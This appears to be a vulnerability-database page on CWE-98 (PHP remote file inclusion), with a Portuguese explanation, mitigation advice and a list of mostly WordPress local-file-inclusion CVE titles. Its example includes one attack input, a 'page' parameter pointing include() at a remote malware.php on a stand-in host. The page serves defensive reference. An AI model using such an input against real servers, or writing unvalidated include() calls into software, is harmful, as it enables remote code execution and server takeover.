Weaknesses of type CWE-98

1,304 results

Inclusão remota de arquivo

Ocorre quando a aplicação inclui dinamicamente um arquivo (via funções como `include()`, `require()` em PHP) sem validar corretamente a entrada do usuário. Um atacante fornece uma URL remota maliciosa e consegue executar código arbitrário no servidor, comprometendo completamente a aplicação.

Example

Uma página PHP recebe um parâmetro `page` e faz `include($_GET['page'])`. Um atacante passa `page=http://seuservidor.com/malware.php` e consegue executar o arquivo malicioso no contexto do servidor web, roubando dados ou instalando backdoors.

How to mitigate

Valide rigorosamente entrada de usuário: use lista branca de arquivos permitidos, não permita URLs remotas, desabilite as directives `allow_url_include` e `allow_url_fopen` no PHP, e sempre sanitize caminhos de arquivo.

CVE-2026-27052HIGHWordPress Sales Countdown Timer for WooCommerce and WordPress plugin < 1.1.9 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-27343HIGHWordPress Airtifact theme <= 1.2.91 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-11920HIGHWPCOM Member <= 1.7.14 - Authenticated (Contributor+) Local File Inclusion via ShortcodeEPSS 0.5%CVE-2026-63302MEDIUMLocal File Inclusion in Quick.CMSEPSS 0.5%CVE-2025-48298HIGHWordPress SEOPress for MainWP <= 1.4 - Local File Inclusion VulnerabilityEPSS 0.5%CVE-2025-53207HIGHWordPress WP Travel Gutenberg Blocks plugin <= 3.9.0 - Local File Inclusion VulnerabilityEPSS 0.5%CVE-2025-54689HIGHWordPress Urna Theme <= 2.5.7 - Local File Inclusion VulnerabilityEPSS 0.5%CVE-2024-50497HIGHWordPress Advanced Online Ordering and Delivery Platform plugin <= 2.0.0 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-30835HIGHWordPress Accounting for WooCommerce plugin <= 1.6.8 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22366HIGHWordPress Jude theme <= 1.3.0 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-41734CRITICALUnauthenticated Local File Inclusion in php moduleEPSS 0.5%CVE-2025-68545HIGHWordPress Nika theme <= 1.2.14 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-31387HIGHWordPress InstaWP Connect plugin <= 0.1.0.82 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2024-52428HIGHWordPress Ads Booster by Ads Pro plugin <= 1.12 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-53210HIGHWordPress ZoloBlocks Plugin <= 2.3.2 - Local File Inclusion VulnerabilityEPSS 0.5%CVE-2025-48330HIGHWordPress Real Time Validation for Gravity Forms <= 1.7.0 - Local File Inclusion VulnerabilityEPSS 0.5%CVE-2025-25174CRITICALWordPress BeeTeam368 Extensions Plugin <= 1.9.4 - Local File Inclusion VulnerabilityEPSS 0.5%CVE-2024-38735HIGHWordPress Event post plugin <= 5.9.5 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22514HIGHWordPress Unica theme <= 1.4.1 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2026-22515HIGHWordPress VegaDays theme <= 1.2.0 - Local File Inclusion vulnerabilityEPSS 0.5%